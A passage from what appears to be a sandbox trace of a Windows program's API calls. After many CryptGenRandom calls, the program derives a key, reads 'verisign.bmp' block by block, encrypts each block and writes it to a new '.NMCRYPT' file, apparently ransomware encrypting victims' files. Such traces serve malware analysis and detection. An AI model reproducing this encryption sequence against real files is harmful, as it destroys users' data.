pbBuffer=0x2d7eb10) returned 1 [0166.820] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.821] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.822] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0166.823] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7eb2c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0166.823] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7eb2c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0166.824] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0166.824] CryptHashData (hHash=0x9ad838, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.824] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad2b8) returned 1 [0166.824] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0166.824] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0166.824] wcslen (_String="\\\\?\\") returned 0x4 [0166.824] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7eb34 | out: phKey=0x2d7eb34*=0x9ad5b8) returned 1 [0166.824] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.NMCRYPT" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.824] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.825] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7eb24 | out: lpFileSize=0x2d7eb24*=2702) returned 1 [0166.825] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7eb1c*=0x200, lpOverlapped=0x0) returned 1 [0166.825] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.826] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.826] GetLastError () returned 0x0 [0166.827] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.839] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2892010*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0166.840] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0166.840] GetLastError () returned 0x0 [0166.840] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0166.840] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892010, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: 